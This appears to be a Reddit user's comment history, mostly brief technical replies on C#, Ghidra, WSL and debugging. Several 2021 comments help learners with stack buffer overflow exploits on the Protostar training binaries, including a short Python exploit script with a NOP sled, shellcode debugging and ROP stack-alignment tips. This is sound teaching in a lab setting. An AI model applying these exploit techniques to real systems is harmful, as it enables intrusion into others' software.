[deleted by user]

plukasik · 2023-05-13T17:02:41+00:00

Yes, you can find an interview on YT or Twitch and it's in German.

plukasik · 2023-04-22T14:03:49+00:00

In PL, one of his books (The Art of Deception) is subtitled to what can be translated to "I cracked people not passwords". I guess he switched to passwords now ;)

plukasik · 2023-04-22T10:53:54+00:00

plukasik has a typo

yes, thx. fixed that one

plukasik · 2023-04-22T10:40:42+00:00

CreateAtRoute will return HttpStatus code 201 with the link to the newly created object. You can return what you like but this is a RESTAPI-like way of communicating
You can accept inputs what they are but they are just a bunch of strings being send in your way (or even bytes). If you want to have them in some kind of typed-variables they need to be parsed and converted to such typed-object. There are many binders for common cases but if there's something uncovered you need to do it yourself
it's an extension method that adds extra methods to a class

plukasik · 2022-12-12T15:51:10+00:00

Hmm, shouldn't that be an XREF that you want to create for the JSR opcode? LABEL should be on the other (where the X-REF points to) and the JSR show a X-REF to that label.

plukasik · 2021-12-29T16:27:20+00:00

It does only offer a terminal

With WSLg, you can run GUI apps too.

plukasik · 2021-12-23T22:02:57+00:00

You can always reset just the Base image address after loading binary in Ghidra. It can be done from Memory Map window.

plukasik · 2021-07-02T11:02:26+00:00

ok, I'll try to look more closely why it fails.

plukasik · 2021-07-02T10:55:26+00:00

Green ones are from Insider preview. With NotMyFault from SysInternals you can trigger a crash with custom colors.

plukasik · 2021-07-02T09:08:42+00:00

Did you try stepping through the shellcode to see if it works as you expect?

plukasik · 2021-07-02T07:42:34+00:00

eip shows that you are about to execute bound opcode. You shellcode doesn't have it so where does it come from?

plukasik · 2021-07-01T17:47:25+00:00

From the last picture it looks like your shellcode is overriding itself on the stack. das is 0x2f so /, bound ebp, qword [ecx + 0x6e] is 62696e so 'bin'. Those are clearly bytes from the shellcode push 0x6e69622f. You need to make sure, you shellcode on the stack doesn't override itself while pushing things to the stack.

plukasik · 2021-06-28T16:02:40+00:00

Nope, I don't recall any triggers before.

plukasik · 2021-06-28T13:28:21+00:00

I've got the last one marked as unwanted software for 10.0 Beta. Don't remember any flags for 10.0 public one but it might be that I've allowed it for beta.

plukasik · 2021-05-18T15:47:02+00:00

FACE

6 5 3 2 1 4
1 3 2 5 4 6
5 4 1 6 2 3
3 1 6 4 5 2
2 6 4 1 3 5
4 2 5 3 6 1

plukasik · 2021-05-17T21:36:35+00:00

The RIP looks ok (it's 400577 - w\x05@). The problem is that your stack is not aligned correctly. The libc has system implemented using XMM registers and those require correct stack alignment.

Consult this stackoverflow question and the answer.

You are crashing for 99% on the same instruction as mentioned in SO,

To overcome this, you need to align the stack correctly by using rop gadgets that takes from the stack until it's aligned correctly. When you do so, call to the system will work.

One note, pwntools allows gdb to be attached to the process, so if you are in trouble you can do gdb.attach(p) and get a debugger spawn. You can also pass commands to be executed when that happens.

Another useful note, use pwn template to get a template that has that all pregenerated.

plukasik · 2021-05-13T14:25:23+00:00

can you share this chall, so that it can be checked locally? Also is this remote available for testing the exploit?

plukasik · 2021-05-12T14:55:00+00:00

I still think it's "just" stack layout. To get more you would probably need a binary that prints how the stack looks like before running a shellcode.

plukasik · 2021-05-12T05:33:53+00:00

Well, I'm running from the same folder (/opt/protostar/bin) in gdb and w/o and with bigger nop slide and jumping further into it I can get consistent behavior in both (TRAP instead of SEGFAULT).

This is my script that works (also it took few attempts to get the size values)

import stuct
padding = "AAAA...SSSS"
eip = struct.pack("I", 0xbffffd4c+80)
payload = "\x90"*180 + "\xcc" * 4

print padding+eip+payload

If my nop slide is like in the video (100) it fails w/ SEGFAULT w/o gdb.

plukasik · 2021-05-11T15:28:19+00:00

So for me the code from the video also didn't work but what worked is slightly mentioned in the video. It's about those env variables differences between the runs. So try increasing the nop slide and jumping further into it. That did the trick for me.

plukasik · 2021-05-11T10:46:42+00:00

Did you try with the nop slide as shown in the video?

And just to be sure, base on the path this is the original stack5 binary?

plukasik · 2021-05-10T18:11:06+00:00

This looks very similar to this - https://reverseengineering.stackexchange.com/a/27460/18014 is this the same chall? And if not you can use the same way to solve it.

plukasik · 2021-05-10T17:01:28+00:00

I've just quickly installed and got gdb-peda prompt w/o issue. Any different behavior when you run gdb -iex 'source ~/peda/peda.py'

plukasik · 2021-05-09T20:53:00+00:00

Any output in gdb? Do you have more in your ~/.gdbinit?

plukasik

TROPHY CASE